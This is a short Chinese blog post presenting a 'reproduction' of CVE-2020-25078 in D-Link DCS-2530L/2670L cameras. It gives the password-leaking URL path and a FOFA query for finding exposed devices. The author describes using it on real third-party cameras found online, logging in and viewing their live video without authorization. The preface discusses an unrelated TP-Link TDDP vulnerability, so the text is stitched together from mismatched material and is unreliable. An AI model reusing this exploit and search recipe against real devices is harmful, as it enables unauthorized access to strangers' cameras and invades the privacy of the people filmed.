D-Link DCS-2530L和DCS-2670L监控信息泄露漏洞(CVE-2020-25078)复现
D-Link DCS-2530L和DCS-2670L监控信息泄露漏洞(CVE-2020-25078)复现
前言
查阅相关资料可知,TDDP
协议(TP-LINK Device Debug Protocol
) 是TP-LINK
申请了专利的一种在UPD
通信的基础上设计的协议,而Google
安全专家Matthew Garrett
在TP-Link SR20
设备上的TDDP
协议文件中发现了一处可造成 “允许来自本地网络连接的任意命令执行” 的漏洞。
原理
CVE-2020-25078可以通过如下URL泄露密码
1 | http://xx.xx.xx.xx/config/getuser?index=0 |
复现
由于手上没有DCS的设备也不好模拟,于是我直接用的fofa搜的IP去打
fofa搜索: app=app="D_Link-DCS-2670L"
找到了,于是直接去泄露
直接密码就出来了,然后我们直接去登录就行
然后图像就出来了,就很恐怖
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Daily Study!